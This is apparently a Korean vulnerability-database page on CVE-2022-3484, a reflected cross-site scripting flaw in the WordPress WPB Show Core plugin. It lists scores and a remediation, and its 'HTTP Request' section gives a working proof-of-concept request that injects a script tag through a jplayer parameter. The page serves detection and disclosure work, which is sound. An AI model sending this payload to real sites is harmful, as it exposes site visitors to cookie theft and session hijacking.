🔙 목록으로 돌아가기

CVE-2022-3484: WordPress WPB Show Core - Cross-Site Scripting

TitleWordPress WPB Show Core - Cross-Site Scripting
Authortheamanrawat
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.
RemediationUpdate to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability.
CVSS Score6.1
EPSS Score0.03299
CVE IDCVE-2022-3484
CWE IDCWE-79
Tags cve cve2022 wpscan wp-plugin wp wordpress xss wpb-show-core wpb_show_core_project vuln

🔍 Vulnerability Description

WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

🌐 HTTP Request

GET /wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3484.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-3484.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A